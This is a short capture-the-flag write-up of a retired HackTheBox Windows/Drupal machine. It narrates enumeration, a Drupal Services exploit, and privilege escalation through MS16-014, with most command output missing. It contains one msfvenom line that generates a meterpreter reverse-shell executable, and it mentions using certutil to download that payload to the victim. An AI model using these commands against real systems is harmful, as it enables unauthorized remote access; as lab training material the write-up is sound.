The other day, a friend asked if I was on HacktheBox and I was reminded that I'd been absent for a while.  Apparently, they are cranking out a new box every week which could be good or bad -- I'm not really sure.  While looking for something to write, I thought I'd take on one of their retired boxes and that would solve two "needs" simultaneously.  

This box was interesting mostly because of the hunt for the exploit to gain a foothold on the system.  From there, it was trial and error as to which technique would work for a particular task.  After that, root was easy.

First, we kick off with Nmap:

Right off the bat, we see that we're running Windows / IIS and we're running Drupal. 

We check out the Drupal site:

We get the Drupal version:

We run Droopescan:

We search through Searchsploit:

We find a vulnerability in Services with an exploit which does not work.  I tried troubleshooting the issue but no such luck.  I then go hunting the web and I find:

Let's see if we can get a simple "whoami":


Next, let's check out the architecture:

We need a reverse shell:

msfvenom -p windows/x64/meterpreter/reverse_tcp -a x64 --platform windows LHOST= LPORT=443 -f exe >> mshell443.exe

I realize I have a shell with that name and I rename my shell to bastard.exe

After some trial and error with downloading the file, certutil proves to be the winner.  

We move the shell to our victim:

We check the directory as a sanity check.  I should also point out that I created that directory earlier. 

We execute our shell:

With our handler setup:

We catch the inbound connection:

We move to Exploit Suggester:

For some reason, ms16-075 does not work.  I move to ms16-014:

And... we're root!